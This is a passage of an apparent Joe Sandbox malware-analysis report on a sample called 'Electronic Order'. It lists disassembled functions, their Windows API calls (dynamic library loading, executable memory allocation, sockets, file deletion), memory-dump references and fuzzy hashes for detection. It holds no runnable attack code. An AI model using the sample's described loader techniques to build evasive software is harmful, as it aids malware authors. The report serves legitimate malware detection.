                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 1931a04e0e6721a6f45b0a1d7ad6ca077048daeb6e143113ff08d9af7b077684
                                      • Instruction ID: ca6ae4e0b2a3e11eef70f64d0deb54b920b255d30d7ba9ca36e5b264eefe3328
                                      • Opcode Fuzzy Hash: 1931a04e0e6721a6f45b0a1d7ad6ca077048daeb6e143113ff08d9af7b077684
                                      • Instruction Fuzzy Hash: 5831B231604206AFDB118F34EC45BEA77A9EB49328F205729F8B5B31E0C731E8519BA0
                                      Function 00E47648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E476D0
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E476E4
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E47708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: 4606e9890d282259c4a209a2f89eee1655ee49133ed2e4376f304f48a0e4740b
                                      • Instruction ID: c2c156f68a5345f7b09403dd60349fed62189231561c032734c3013e11df91c1
                                      • Opcode Fuzzy Hash: 4606e9890d282259c4a209a2f89eee1655ee49133ed2e4376f304f48a0e4740b
                                      • Instruction Fuzzy Hash: 3321EF32500218AFDF158EA4DC46FEA3BA9EB48714F111254FE557B1D0DBB1A8508BE0
                                      Function 00E46F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E46FAA
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E46FBA
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E46FDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: ed4543ac39c4dd93d112469a2e5b003a90e0cac7612527c1657791ad8307c1ec
                                      • Instruction ID: 302e9a1c5a4337f48275ff0c9ded00f33d83ffb58b43f55efeec02374747f01a
                                      • Opcode Fuzzy Hash: ed4543ac39c4dd93d112469a2e5b003a90e0cac7612527c1657791ad8307c1ec
                                      • Instruction Fuzzy Hash: 3821C232710218BFDF118F54EC85FAB37AAEF8A758F019124F944AB190C671AC56CBA0
                                      Function 00E4797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E479E1
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E479F6
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E47A03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 0b01f0a59b7d3380f321010b8f3d8c267971d2246bddd2f687f752c863f3b346
                                      • Instruction ID: fe3fd35ba295e59cb9717c6e4802b6182075b98a951e44a4d642656eb4be9a40
                                      • Opcode Fuzzy Hash: 0b01f0a59b7d3380f321010b8f3d8c267971d2246bddd2f687f752c863f3b346
                                      • Instruction Fuzzy Hash: 8111C132654248BAEF149E61DC05FEB37A9EF89B68F024519FA45B6090D372A811DBA0
                                      Function 00DC4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DC4C2E), ref: 00DC4CA3
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DC4CB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: 15e280e7e9b7d2fe7d321a95c75fb0ac94d8f5159d058e3417a21d74b74c9f6e
                                      • Instruction ID: 5d6e88512d1d59948fbd7cd154bbc23187f31fcaaec2433fbe92e1985a057dba
                                      • Opcode Fuzzy Hash: 15e280e7e9b7d2fe7d321a95c75fb0ac94d8f5159d058e3417a21d74b74c9f6e
                                      • Instruction Fuzzy Hash: 82D01274511723CFD7205F31DA18A0676D5AF06B91B15883DD885E6660DA70D480C660
                                      Function 00DC4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DC4CE1,?), ref: 00DC4DA2
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DC4DB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 3c16b2854dc1e3dd20bbf514123456367b36ee230166ec502c2824e9f483d8bc
                                      • Instruction ID: 86eb22d21ba7d2169490417b27cbff1d58b8ac5eaa89c2d2576aa3311e3f961d
                                      • Opcode Fuzzy Hash: 3c16b2854dc1e3dd20bbf514123456367b36ee230166ec502c2824e9f483d8bc
                                      • Instruction Fuzzy Hash: 8ED01775950713CFD720AF32D818B4676E4AF06BA5B15C87ED8C6E6650EB70D880CA60
                                      Function 00DC4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DC4D2E,?,00DC4F4F,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4D6F
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DC4D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 75ee5af55effebd109810dc4f85f0c7cbd318836c25346bd9faa32cc4f029614
                                      • Instruction ID: 03f94c8c6778c2144ac334d441da265d3748674446bc52b9dd5a9940db5ec829
                                      • Opcode Fuzzy Hash: 75ee5af55effebd109810dc4f85f0c7cbd318836c25346bd9faa32cc4f029614
                                      • Instruction Fuzzy Hash: FFD01274510713CFD7205F31D818B1676D8BF16751B19C97DD887E6650D670D480CA60
                                      Function 00E41072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00E412C1), ref: 00E41080
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E41092
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: 17aa9ede0be1c2329b70aefe26e128b805cf4ff0f9b0c567ab252c625f1ff939
                                      • Instruction ID: 75e96c5497de0df606f18a87a70f09f8901574504fe86489bc267b40d4b04391
                                      • Opcode Fuzzy Hash: 17aa9ede0be1c2329b70aefe26e128b805cf4ff0f9b0c567ab252c625f1ff939
                                      • Instruction Fuzzy Hash: F4D0C230411352CFC7204F31E818A1672E4AF05751F01DC39E489F6260DB70C4C0C600
                                      Function 00E393F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E39009,?,00E4F910), ref: 00E39403
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E39415
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 09fd69cc65a6a4becc781cca1ff9a5fd50613ea6bb83414ae7f9cc540a9ab17a
                                      • Instruction ID: 2f74d6732a006ee5aeab835c70662a516ea5c3762a4b52fda4d3ef526ff2cd33
                                      • Opcode Fuzzy Hash: 09fd69cc65a6a4becc781cca1ff9a5fd50613ea6bb83414ae7f9cc540a9ab17a
                                      • Instruction Fuzzy Hash: 2ED0C234500313CFC7205F31DA4C50776D4AF02741F10D839D495F2651D7B0C480C610
                                      Function 00E01B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: dccbb38bc1f02b623fc7cb1b4701ede251428208e20870f9a08ee2a0e5b2ef1c
                                      • Instruction ID: 423b444c32da0159421d823b1078dc5f4a9fff3f22f0c8aae56f166c59e3f54f
                                      • Opcode Fuzzy Hash: dccbb38bc1f02b623fc7cb1b4701ede251428208e20870f9a08ee2a0e5b2ef1c
                                      • Instruction Fuzzy Hash: FED01275804119EACB149A918C88DF9777CE744301F5425D2F506B6080F3749BC59F35
                                      Function 00E176C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc9868469739cb9d5f008a8258c3d162c3c388a01a0468d50078fe65e55e9510
                                      • Instruction ID: 0ab8f6441890e302e9e5ad7914838dd267bf6f6ab90ac3aec8aee787f7fe4583
                                      • Opcode Fuzzy Hash: fc9868469739cb9d5f008a8258c3d162c3c388a01a0468d50078fe65e55e9510
                                      • Instruction Fuzzy Hash: B1C17E74A04216EFCB14CF94C884EAEB7F5FF88B14B119599E885EB251D730EE81CB90
                                      Function 00E3E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 00E3E3D2
                                      • CharLowerBuffW.USER32(?,?), ref: 00E3E415
                                        • Part of subcall function 00E3DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E3DAD9
                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E3E615
                                      • _memmove.LIBCMT ref: 00E3E628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                      • String ID:
                                      • API String ID: 3659485706-0
                                      • Opcode ID: f1742fdde47fa508c8962f0c81f52bd8312ee5a71a77996ea811d0bafe77aeb8
                                      • Instruction ID: 61d79c59099c8574e82e22e78db72a980bddc337322fa5fcda132211350610a0
                                      • Opcode Fuzzy Hash: f1742fdde47fa508c8962f0c81f52bd8312ee5a71a77996ea811d0bafe77aeb8
                                      • Instruction Fuzzy Hash: 8BC15A716083019FC714DF28C484A6ABBE4FF88718F14896DF899AB391D771E946CF92
                                      Function 00E383A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00E383D8
                                      • CoUninitialize.OLE32 ref: 00E383E3
                                        • Part of subcall function 00E1DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E1DAC5
                                      • VariantInit.OLEAUT32(?), ref: 00E383EE
                                      • VariantClear.OLEAUT32(?), ref: 00E386BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 32d64a81d98ea7f4d8a223388d2b4a9604fbf329b6f5901067e2a186c58bc38b
                                      • Instruction ID: 176868bef721b92efc71298109e4f39493376c0c24dc69acc42c1d2953eda8d6
                                      • Opcode Fuzzy Hash: 32d64a81d98ea7f4d8a223388d2b4a9604fbf329b6f5901067e2a186c58bc38b
                                      • Instruction Fuzzy Hash: CCA114752047029FCB10DF25C999B5ABBE4BF88714F15544CF99AAB3A1CB30ED05CB62
                                      Function 00E16DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: a7c569fe6605c3b03562c490d089dd2477196d6b1dd3a358d47ddce00231a953
                                      • Instruction ID: 02c746ca74fe103407e6ca3e914d8cd22bdce7a2f3f2358c782c4635dd960b75
                                      • Opcode Fuzzy Hash: a7c569fe6605c3b03562c490d089dd2477196d6b1dd3a358d47ddce00231a953
                                      • Instruction Fuzzy Hash: E85196747043029ADB20AF65D495BE9B3F5EF4C710F20A81FE596EB291DE70D8C19B11
                                      Function 00E49A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(015AEA70,?), ref: 00E49AD2
                                      • ScreenToClient.USER32(00000002,00000002), ref: 00E49B05
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E49B72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: dd64c30067dd3e5b8129e4abad31b604ec2f0146c08a225ddb8a6d6c3c81d509
                                      • Instruction ID: 2e49763e1e46a6941c75c1a4fd627761498307bfa7fc07ca7441d2c46ee0dde6
                                      • Opcode Fuzzy Hash: dd64c30067dd3e5b8129e4abad31b604ec2f0146c08a225ddb8a6d6c3c81d509
                                      • Instruction Fuzzy Hash: B9514D34A00209EFCF14DF68E881AAE7BB5FF45324F108259F819BB2A1D730AD41DB94
                                      Function 00E36CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00E36CE4
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36CF4
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E36D58
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36D64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast$__itow__swprintfsocket
                                      • String ID:
                                      • API String ID: 2214342067-0
                                      • Opcode ID: 7e90f517339d4b8aca4f30542dc34bd099d4aba509d5a19c5f4715c86169973f
                                      • Instruction ID: f7284c7f2c25d93d44384b139f8251e6b4556b088cb53120fea80530276d23cf
                                      • Opcode Fuzzy Hash: 7e90f517339d4b8aca4f30542dc34bd099d4aba509d5a19c5f4715c86169973f
                                      • Instruction Fuzzy Hash: D341C274740201AFEB10AF34DC8AF7A7BE9DB04B14F54801CFA19AF2C2DA719C018BA1
                                      Function 00E3672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E4F910), ref: 00E367BA
                                      • _strlen.LIBCMT ref: 00E367EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID:
                                      • API String ID: 4218353326-0
                                      • Opcode ID: 3602c42cc6b543bffaca03791f688824a1ce88cdce68ace6bd94e16005c9b4cb
                                      • Instruction ID: 884f3197c4b6c84c548f90576080aa09c812f86e6b07b917dcdbfb3a396a3d90
                                      • Opcode Fuzzy Hash: 3602c42cc6b543bffaca03791f688824a1ce88cdce68ace6bd94e16005c9b4cb
                                      • Instruction Fuzzy Hash: 1F41E331A00105AFCB14EBB4DCD9FAEB7A9EF48314F158169F815AB292DB30AD40C760
                                      Function 00E2BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E2BB09
                                      • GetLastError.KERNEL32(?,00000000), ref: 00E2BB2F
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E2BB54
